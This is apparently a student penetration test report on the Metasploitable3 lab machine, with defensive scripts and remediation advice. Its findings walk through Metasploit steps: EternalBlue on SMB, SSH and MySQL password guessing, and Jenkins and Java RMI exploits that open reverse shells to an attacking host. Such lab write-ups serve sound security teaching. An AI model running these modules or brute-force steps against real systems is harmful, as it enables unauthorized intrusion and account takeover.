
Penetration Test Report (Ethical Penetration Test Report)

Prepared by:

Reem Asiri, Hesham Khaled, Mansor Khaled, Sara Al Qahtani

EXECUTIVE SUMMARY

We performed a security assessment of Metasploitable3. The penetration test simulated an attack from an external threat actor attempting to gain access to the system. The purpose of this assessment was to discover and identify vulnerabilities and suggest methods to remediate them. We identified vulnerabilities within the scope of the engagement; they are broken down by severity in the table below.

Severity   Count
HIGH       4
MEDIUM     2
LOW        0

The highest-severity finding is a remote code execution (RCE) vulnerability in the SMB service. An attacker can exploit it by sending a malicious request to the SMB service, causing malicious code to be executed on the target system and giving the attacker full control over it. To ensure data confidentiality, integrity, and availability, the security remediations listed in this report should be implemented.

Note that this assessment may not disclose all vulnerabilities that are present on the system within the scope. Any changes made to the environment during the period of testing may affect the results of the assessment.

SCOPE

The scope of this penetration test was to identify and assess vulnerabilities in the Metasploitable3 virtual machine. The Metasploitable3 virtual machine is a popular target for penetration testers, as it contains a variety of vulnerable systems and applications. The scope of this penetration test included the following:

  • Network-level testing: This included scanning for open ports and vulnerabilities on the Metasploitable3 virtual machine.
  • Host-level testing: This included testing for vulnerabilities in the operating systems and applications that are installed on the Metasploitable3 virtual machine.

The scope of this penetration test did not include the following:

  • Physical security testing: This includes testing for vulnerabilities in physical security controls, such as physical access controls and environmental controls.
  • Social engineering testing: This includes testing for vulnerabilities in social engineering attacks, such as phishing and pretexting.
  • Compliance testing: This includes testing for compliance with specific security standards, such as PCI DSS and HIPAA.

Methodology

The following methodology was used to conduct this penetration test:

  • Information gathering: This included gathering information about the Metasploitable3 virtual machine, such as the IP addresses, domain names, and open ports.
  • Vulnerability scanning: This included using automated tools to scan for vulnerabilities on the Metasploitable3 virtual machine.
  • Penetration testing: This included using manual techniques to exploit vulnerabilities on the Metasploitable3 virtual machine.
  • Reporting: This included documenting the findings of the penetration test and providing recommendations for remediation.

TESTING METHODOLOGY

Testing methodology was split into three phases: Reconnaissance, Target Assessment, and Execution of Vulnerabilities. During reconnaissance, we gathered information about the system. We used port scanning and other enumeration methods to refine target information and assess target values. Next, we conducted our targeted assessment. We simulated an attacker exploiting vulnerabilities in the Windows 7 system. We gathered evidence of vulnerabilities during this phase of the engagement while conducting the simulation in a manner that would not disrupt normal business operations.

The following image is a graphical representation of this methodology.

Figure 1

CLASSIFICATION DEFINITIONS

Risk Classifications

Level          Score   Description
Critical       10      The vulnerability poses an immediate threat to the organization. Successful exploitation may permanently affect the organization. Remediation should be immediately performed.
High           7-9     The vulnerability poses an urgent threat to the organization, and remediation should be prioritized.
Medium         4-6     Successful exploitation is possible and may result in notable disruption of business functionality. This vulnerability should be remediated when feasible.
Low            1-3     The vulnerability poses a negligible/minimal threat to the organization. The presence of this vulnerability should be noted and remediated if possible.
Informational  0       These findings have no clear threat to the organization, but may cause business processes to function differently than desired or reveal sensitive information about the company.

Exploitation Likelihood Classifications

Likelihood   Description
Likely       Exploitation methods are well-known and can be performed using publicly available tools. Low-skilled attackers and automated tools could successfully exploit the vulnerability with minimal difficulty.
Possible     Exploitation methods are well-known and may be performed using public tools, but require configuration. Understanding of the underlying system is required for successful exploitation.
Unlikely     Exploitation requires deep understanding of the underlying systems or advanced technical skills. Precise conditions may be required for successful exploitation.

Business Impact Classifications

Impact     Description
Major      Successful exploitation may result in large disruptions of critical business functions across the organization and significant financial damage.
Moderate   Successful exploitation may cause significant disruptions to non-critical business functions.
Minor      Successful exploitation may affect few users, without causing much disruption to routine business functions.

Remediation Difficulty Classifications

Difficulty   Description
Hard         Remediation may require extensive reconfiguration of underlying systems that is time consuming. Remediation may require disruption of normal business functions.
Moderate     Remediation may require minor reconfigurations or additions that may be time-intensive or expensive.
Easy         Remediation can be accomplished in a short amount of time, with little difficulty.

Gathering information

Information gathering is the first and most important step in the penetration test process. It consists of collecting as much information as possible about the targeted system or network. This information is then used to identify vulnerabilities and plan attack vectors.

We scanned the IP address of the target using Nmap.

The screenshot below shows that ports 139 and 445 were open and running an SMB service, which suggests possible vulnerabilities.

SMB is used for file and printer sharing on Windows, so we can scan for the vulnerability available on port 445 by using NSE (Nmap Scripting Engine).

The screenshot below shows that port 445 is vulnerable to the remote code execution vulnerability MS17-010.

We searched for the MS17-010 exploit, and as a result we got a list of different exploits.

We used an auxiliary module to scan the host and confirm whether or not the system is vulnerable to MS17-010.

The result shows that the system is affected by this vulnerability.

The following exploit was used successfully:

exploit/windows/smb/ms17_010_eternalblue

We used the “show options” command to list the required options and then filled them in.

The screenshot below shows successful exploitation and access gained to the Metasploitable3 system.

Here we have a shell with root authority on the targeted system.

Recommendations

Ways to avoid SMB exploitation and keep the service secure against attackers:

  1. Keep the SMB service up to date with the latest version and that all updates and security patches are applied.
  2. Disable the service if not in use.
  3. Enable SMB encryption to ensure that data transmitted over the network is secure and protected from interception by hackers.
  4. Implement firewalls to limit access to SMB traffic and block unauthorized access attempts.
  5. Limit access to SMB shares to only those users who need it, and ensure that access is granted on a need-to-know basis.
  6. Use strong authentication methods such as two-factor authentication to prevent unauthorized access to SMB shares.
  7. Monitor network activity for unusual or suspicious activity, such as repeated attempts to access SMB shares, which could indicate a potential attack.

The next finding concerns SSH. An SSH attack is a type of cyberattack that targets the Secure Shell (SSH) protocol, which is used to securely access and manage remote servers. Attackers can use a variety of techniques to exploit weaknesses in SSH servers, such as brute-force attacks, phishing attacks, and man-in-the-middle attacks.

Here, we used a brute-force attack.

From the earlier Nmap scan we found that the SSH port is open.

We need a dictionary file to carry out the brute-force attack.

To make a dictionary file, type the following command:

cewl https://github.com/rapid7/metasploitable3/wiki -m 7 -d 0 -w JK.txt

CeWL is a tool that builds a custom wordlist from a given URL. The command above builds a dictionary file from the Metasploitable3 wiki (minimum word length 7, spidering depth 0), which might help us find the password.

We used the Metasploit SSH login scanner module (auxiliary/scanner/ssh/ssh_login). This module tests SSH logins on a range of machines and reports successful logins. If you have loaded a database plug-in and connected to a database, this module will record successful logins and hosts so you can track your access.

We ran the “show options” command to list the required options, then filled them in with the set command:

(RHOSTS, RPORT, USERNAME, PASS_FILE, STOP_ON_SUCCESS, VERBOSE)

Then we ran the exploit command.

Now we can see that we have a successful login to the targeted machine via the brute-force attack.

A shell session is opened.

Recommendations

There are a number of things you can do to protect against SSH attacks, including:

  • Use strong passwords: A strong password is at least eight characters long and includes a mix of upper and lowercase letters, numbers, and symbols.
  • Use two-factor authentication: Two-factor authentication adds an extra layer of security by requiring you to enter a code from your phone or another device in addition to your password.
  • Keep your SSH server software up to date: Software updates often include security patches that can fix vulnerabilities that attackers can exploit.
  • Disable root login: The root account is the most powerful account on a Linux system, so it is a prime target for attackers. Disabling root login and using a different account with sudo privileges can help to protect your system from attack.
  • Use SSH key authentication: SSH key authentication is a more secure way to authenticate to an SSH server than using passwords. With SSH key authentication, you generate a pair of keys: a public key and a private key. The public key is stored on the SSH server, and the private key is stored on your local computer. When you connect to the SSH server, you use your private key to authenticate yourself.
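As an added illustration of the monitoring side of these recommendations (example code written for this report, not part of the original assessment or of any tool it used), the following Python script parses OpenSSH auth.log lines and flags a source address that produces a burst of failed logins followed by a successful password login, which is the trace a dictionary attack like the one above leaves behind. The log lines are constructed samples; the year, the failure threshold and the time window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of OpenSSH auth.log lines (not captured from the lab):
# a burst of failures from one source followed by a success, then normal
# activity from another host.
SAMPLE_AUTH_LOG = """\
Jan 10 12:00:01 target sshd[2001]: Failed password for root from 10.0.2.100 port 40001 ssh2
Jan 10 12:00:02 target sshd[2002]: Failed password for root from 10.0.2.100 port 40002 ssh2
Jan 10 12:00:02 target sshd[2003]: Failed password for invalid user admin from 10.0.2.100 port 40003 ssh2
Jan 10 12:00:03 target sshd[2004]: Failed password for root from 10.0.2.100 port 40004 ssh2
Jan 10 12:00:04 target sshd[2005]: Failed password for root from 10.0.2.100 port 40005 ssh2
Jan 10 12:00:05 target sshd[2006]: Accepted password for root from 10.0.2.100 port 40006 ssh2
Jan 10 12:30:00 target sshd[2100]: Failed password for alice from 10.0.2.50 port 50001 ssh2
Jan 10 12:45:00 target sshd[2101]: Accepted publickey for alice from 10.0.2.50 port 50002 ssh2
"""

# Matches the "Failed/Accepted <method> for [invalid user] <user> from <ip>" lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)

def parse_line(line, year=2024):
    """Return (timestamp, result, method, user, ip), or None for other lines.
    Syslog timestamps carry no year, so one is assumed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["method"], m["user"], m["ip"]

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag source IPs with >= threshold failures inside a sliding window and
    record whether a password login from that IP succeeded afterwards."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still in the window
    flagged = {}                  # ip -> {"failures": peak count, "success_after": bool}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, method, user, ip = parsed
        if result == "Failed":
            q = recent[ip]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()           # drop failures older than the window
            if len(q) >= threshold:
                entry = flagged.setdefault(ip, {"failures": 0, "success_after": False})
                entry["failures"] = max(entry["failures"], len(q))
        elif result == "Accepted" and method == "password" and ip in flagged:
            # A password success right after a burst of failures is the
            # strongest sign that a guessed credential worked.
            flagged[ip]["success_after"] = True
    return flagged

if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {info['failures']} failures in window, "
              f"password success afterwards: {info['success_after']}")
```

Feeding the script a real /var/log/auth.log (or journalctl -u ssh output) works unchanged; key-based successes are deliberately not counted, since they are what the recommendations above steer towards.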

We conducted an intensive scan of the system again to search for other vulnerabilities that could be exploited.

It is also possible to scan the open ports from within the Metasploit console, which is started with the command: $ msfconsole -q

After checking, we found an open port, 8484. To find out which service is behind this port, we opened it in the browser at 10.0.2.7:8484.

It opens a page for “Jenkins”, a self-contained, open source automation server which can be used to automate all sorts of tasks related to building, testing, and delivering or deploying software.

Jenkins can be installed through native system packages, Docker, or even run standalone by any machine with a Java Runtime Environment (JRE) installed.

Through this service, we can browse the files inside it.

We noticed that the “Manage Jenkins” sub-page can be accessed and browsed.

The script console was accessible and accepts arbitrary commands, but only written as Groovy script. We found a Groovy command that displays the network address; its output proved that the host can be compromised through this port.

We used the exploit module “exploit/multi/http/jenkins_script_console” to attempt exploitation:

msf6 exploit(multi/http/jenkins_script_console) > set RHOSTS 10.0.2.7
msf6 exploit(multi/http/jenkins_script_console) > set RPORT 8484
msf6 exploit(multi/http/jenkins_script_console) > set TARGETURI /script/
msf6 exploit(multi/http/jenkins_script_console) > set LHOST 10.0.2.100
msf6 exploit(multi/http/jenkins_script_console) > set LPORT 4444
msf6 exploit(multi/http/jenkins_script_console) > exploit

(10.0.2.100 is the IP address of the Kali attacking machine.)

Now, we can see that we have successfully logged into the targeted machine.

We then controlled the system through Meterpreter, browsing files and controlling the system completely.

Recommendations

How to secure a Jenkins server:

  • Enable Jenkins’ security: Jenkins global security is the first line of defense in protecting the assets it controls. Core Jenkins supports four security realms: delegate to servlet container, Jenkins’s own user database, LDAP, and Unix user/group database. The “Unix user/group database” option uses Unix’s PAM database to authenticate Jenkins users. This is useful for extending Jenkins users with Unix servers preconfigured with LDAP (see Nemeth, Hein, & Snyder, 2006). The best authentication method is LDAP because most organizations that use it enforce a 90-day password change. If the LDAP account gets compromised, an account lockout or password reset also protects the Jenkins system that relies on it. The second part of selecting a security realm is the authorization method. Matrix-based security allows user permissions to be configured at a global level. The project-based matrix authorization strategy extends matrix-based security by allowing security on a per-job basis. This option is useful for restricting access to jobs per group or per user.
  • Enable slave-to-master access control: This prevents a node from asking the master to do harmful things, for example when the master needs to temporarily take control of a user’s machine for a specific job. Turn this option off if all nodes are under the full control of the Jenkins master.

  • Enable SSL encryption: No matter how secure the Jenkins security configuration is, passwords are passed around as clear text without the Secure Sockets Layer (SSL). The remedy for passing passwords in clear text is to use an SSL certificate.
  • Use a web server or a Winstone configuration file to terminate SSL.
  • Disable the CLI: When mitigating security risk for any computer system, disable all functionality that is not essential for the system to work. Since the Jenkins Groovy CLI is a security risk for Jenkins servers, and a Jenkins server can be managed without it, it should be disabled by default.
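As an added example (not part of the original report, and not Jenkins’ own code), the following Python script audits a Jenkins config.xml for the global-security settings the recommendations above cover: security enabled, a real authentication realm, and a matrix-based authorization strategy that does not hand Administer to anonymous users. The two config fragments are constructed samples; the element and class names are those Jenkins core writes to $JENKINS_HOME/config.xml and should be checked against your own version.

```python
import xml.etree.ElementTree as ET

# Constructed config.xml samples (not taken from the Metasploitable3 image).
# An instance like the one exploited above has security switched off:
UNSECURED_CONFIG = """
<hudson>
  <useSecurity>false</useSecurity>
  <authorizationStrategy class="hudson.security.AuthorizationStrategy$Unsecured"/>
  <securityRealm class="hudson.security.SecurityRealm$None"/>
</hudson>
"""

# The hardened shape: LDAP realm, project-based matrix authorization, and
# Administer granted to a named group rather than to anonymous.
HARDENED_CONFIG = """
<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.ProjectMatrixAuthorizationStrategy">
    <permission>hudson.model.Hudson.Administer:jenkins-admins</permission>
    <permission>hudson.model.Hudson.Read:authenticated</permission>
  </authorizationStrategy>
  <securityRealm class="hudson.security.LDAPSecurityRealm" plugin="ldap">
    <server>ldaps://ldap.example.test</server>
  </securityRealm>
</hudson>
"""

MATRIX_STRATEGIES = {
    "hudson.security.GlobalMatrixAuthorizationStrategy",
    "hudson.security.ProjectMatrixAuthorizationStrategy",
}

def audit_jenkins_config(xml_text):
    """Return finding codes for the global-security settings; [] means clean."""
    root = ET.fromstring(xml_text)
    findings = []
    if (root.findtext("useSecurity") or "").strip().lower() != "true":
        # With security off, anonymous users reach Manage Jenkins and /script.
        findings.append("SECURITY_DISABLED")
    realm = root.find("securityRealm")
    realm_class = realm.get("class", "") if realm is not None else ""
    if realm_class == "" or realm_class.endswith("$None"):
        findings.append("NO_AUTHENTICATION_REALM")
    strategy = root.find("authorizationStrategy")
    strategy_class = strategy.get("class", "") if strategy is not None else ""
    if strategy_class == "" or strategy_class.endswith("$Unsecured"):
        findings.append("UNSECURED_AUTHORIZATION")   # everyone is an administrator
    elif strategy_class not in MATRIX_STRATEGIES:
        findings.append("NON_MATRIX_AUTHORIZATION")  # no per-user/per-job permissions
    else:
        grants = [(p.text or "").strip() for p in strategy.findall("permission")]
        if "hudson.model.Hudson.Administer:anonymous" in grants:
            findings.append("ANONYMOUS_ADMINISTER")  # matrix present but wide open
    return findings

if __name__ == "__main__":
    print("unsecured:", audit_jenkins_config(UNSECURED_CONFIG))
    print("hardened: ", audit_jenkins_config(HARDENED_CONFIG))
```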

The next finding is Java RMI, an object-oriented Remote Procedure Call (RPC) mechanism available in most Java installations. Software developers can use the technology to make functions available over a network.

After searching the Internet, we identified the service behind this port as Java RMI.

We used the exploit module “exploit/multi/misc/java_jmx_server” to attempt exploitation.

We ran show options, then filled in the required options with the set command:

msf6 exploit(multi/misc/java_jmx_server) > set RHOSTS 10.0.2.7
msf6 exploit(multi/misc/java_jmx_server) > set RPORT 1617
msf6 exploit(multi/misc/java_jmx_server) > set LHOST 10.0.2.100
msf6 exploit(multi/misc/java_jmx_server) > set LPORT 4444

Then we ran the exploit command.

As shown, we obtained a successful session on the targeted machine.

We can control the system through Meterpreter, browsing files or controlling the system completely.

Recommendations

Improve the security of your RMI applications by following these recommendations:

  • Follow Secure Coding Guidelines for Java SE.
  • Always run a security manager when using RMI, either on a client or server. See The Security Manager in The Java Tutorials.
  • Establish a reasonable security policy. For example, grant SocketPermission and allow listen, accept, connect, and resolve actions only among hosts communicating with RMI. Do not have the security policy grant AllPermission. See Permissions in the JDK and Default Policy Implementation and Policy File Syntax.
  • If RMI is being used only for communication among JVMs on the local host, restrict communications to be local only. Accomplish this by specifying the appropriate socket permissions in the security policy file as described previously. Alternatively, you can use RMI APIs directly to restrict connections only to the local host. See an example of this in the documentation for the RMISocketFactory class.
  • Ensure that the value of the java.rmi.server.useCodebaseOnly property is true (which is the default value). Setting this property to false enables remote code loading, which increases the level of security risk to the system. See java.rmi Properties.
  • Run RMI over SSL/TLS, and require authentication for both server and client. For further information, see the following:
    • The SslRMIClientSocketFactory class
    • The SslRMIServerSocketFactory class
    • Using Java RMI with SSL
    • Java Secure Socket Extension (JSSE) Reference Guide
    • JSSE Sample Code

The next finding concerns MySQL, a relational database management system (RDBMS) that is widely used in web applications. MySQL allows developers to store, manage, and retrieve data efficiently. However, MySQL is susceptible to a variety of vulnerabilities that can be exploited by attackers to gain unauthorized access to sensitive data or take control of the database server.

We looked for the running MySQL service and its version on port 3306. Port 3306 is open, so there is a possibility of vulnerabilities.


We again scanned the open ports from within the Metasploit console, started with the command: $ msfconsole -q

To determine the MySQL server version, we used the auxiliary module “auxiliary/scanner/mysql/mysql_version”:

msf6 auxiliary(scanner/mysql/mysql_version) > set RHOSTS 192.168.8.107
msf6 auxiliary(scanner/mysql/mysql_version) > run

We conducted a comprehensive search for MySQL exploits and compiled a list of potential vulnerabilities. To initiate the penetration test, we employed the auxiliary module “auxiliary/scanner/mysql/mysql_login”:

msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.8.107
msf6 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /home/kali/mysql_passwords.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set USERPASS_FILE /home/kali/mysql_passwords.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set USER_AS_PASS true
msf6 auxiliary(scanner/mysql/mysql_login) > run

Using the default-password list from “https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt”, we discovered that the default password “root” had not been changed, granting the attacker unauthorized access to the system.

We have now successfully established a connection to the target MySQL database.


We can now control the MySQL database: this includes browsing the database, executing queries, and creating or deleting tables.

Recommendations

To enhance the security of your MySQL applications, consider implementing these recommendations:

  • Adhere to Secure Coding Guidelines for MySQL:
    Employ secure coding practices to minimize the risk of introducing vulnerabilities into your MySQL applications.
  • Enable MySQL Binary Logging:
    Activate MySQL binary logging to maintain a complete history of database changes, enabling recovery from potential attacks or data corruption.
  • Implement Strong Password Policies:
    Enforce strong password policies for all MySQL accounts, mandating complex passwords with regular changes.
  • Restrict Remote Access:
    Only allow remote access to MySQL from authorized sources, minimizing the attack surface.
  • Enable MySQL Auditing:
    Enable MySQL auditing to track user activity and identify suspicious behavior.
  • Utilize Least Privilege:
    Grant MySQL users only the minimum privileges necessary for their tasks, reducing the potential impact of compromised accounts.
  • Regularly Update MySQL:
    Promptly apply MySQL security patches and updates to address newly discovered vulnerabilities.
  • Perform Regular Security Scans:
    Conduct regular vulnerability scans of your MySQL infrastructure to identify and remediate potential security weaknesses.
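As an added example (not from the original report), the following Python script performs, from the administrator’s side, the check that the mysql_login run above performed from the attacker’s side: it audits rows from mysql.user for empty passwords, root accounts reachable from remote hosts, and mysql_native_password hashes equal to the username or to a short default-credential list, then emits the statements that address the strong-password, remote-access and least-privilege recommendations. The rows, the guess list and the placeholder password are constructed assumptions.

```python
import hashlib

def mysql_native_hash(password):
    """mysql_native_password hash: '*' + SHA1(SHA1(password)) in upper-case hex."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

# Constructed rows in the shape of
#   SELECT user, host, authentication_string FROM mysql.user;
# (sample data, not the Metasploitable3 database).
SAMPLE_USERS = [
    ("root", "%", mysql_native_hash("root")),          # default password, any host
    ("root", "localhost", mysql_native_hash("root")),  # default password, local only
    ("backup", "10.0.2.%", ""),                        # no password at all
    ("app", "10.0.2.20", mysql_native_hash("S3cure-Passw0rd!x")),
]

# Short default-credential list (assumed); extend it from a real wordlist.
DEFAULT_GUESSES = ["root", "mysql", "admin", "password", "toor"]
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

def audit_users(rows, guesses=DEFAULT_GUESSES):
    """Return (user, host, finding) tuples for every weak account setting."""
    findings = []
    for user, host, auth in rows:
        if auth == "":
            findings.append((user, host, "EMPTY_PASSWORD"))
        if user == "root" and host not in LOCAL_HOSTS:
            findings.append((user, host, "REMOTE_ROOT"))
        # Username-as-password first (the case that succeeded above), then defaults.
        for guess in [user] + list(guesses):
            if auth and auth == mysql_native_hash(guess):
                findings.append((user, host, "WEAK_PASSWORD:" + guess))
                break
    return findings

def remediation_sql(findings):
    """One statement per affected account (MySQL 5.7+ syntax); the new
    password is a placeholder to replace before running."""
    by_account = {}
    for user, host, code in findings:
        by_account.setdefault((user, host), set()).add(code.split(":")[0])
    stmts = []
    for (user, host), codes in by_account.items():
        acct = f"'{user}'@'{host}'"
        if "REMOTE_ROOT" in codes:
            stmts.append(f"DROP USER {acct};")  # root must not be reachable remotely
        elif codes & {"EMPTY_PASSWORD", "WEAK_PASSWORD"}:
            stmts.append(f"ALTER USER {acct} IDENTIFIED BY '<NEW-STRONG-PASSWORD>';")
    return stmts

if __name__ == "__main__":
    found = audit_users(SAMPLE_USERS)
    for item in found:
        print(item)
    print("\n".join(remediation_sql(found)))
```

Accounts using caching_sha2_password (the MySQL 8 default) store a salted hash and will not match this check; for those, compare against the server’s own hashing routine instead.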

The last vulnerability we exploited is in vsftpd, which stands for Very Secure FTP Daemon.

After launching Metasploit, we checked the available services on the targeted system with the command: services -R 10.0.2.4

As shown in the screenshot below, the TCP port running the vulnerable vsftpd service is open.

We searched for possible exploits and found the one shown in the screenshot.

In this step we ran show options, filled in the required options with the set command, and ran show options again to confirm that they were set correctly.


Now we have a successful login, and a shell session is opened with root authority.


Recommendations

Exploiting vulnerabilities in software, including VSFTPD 2.3.4, is illegal and unethical without proper authorization. However, understanding these vulnerabilities and their potential impact is essential for system administrators and security professionals.

To protect against exploitation, it is crucial to keep your software and systems up to date with the latest security patches. Consider using modern FTP server software that is actively maintained and designed with security in mind.

APPENDIX A – TOOLS USED

TOOL         DESCRIPTION
Metasploit   Used for exploitation of vulnerable services and vulnerability scanning.
Nmap         Used for scanning ports on hosts.
CeWL         Generates a list of words that can then be used by password crackers.
Table A.1: Tools used during assessment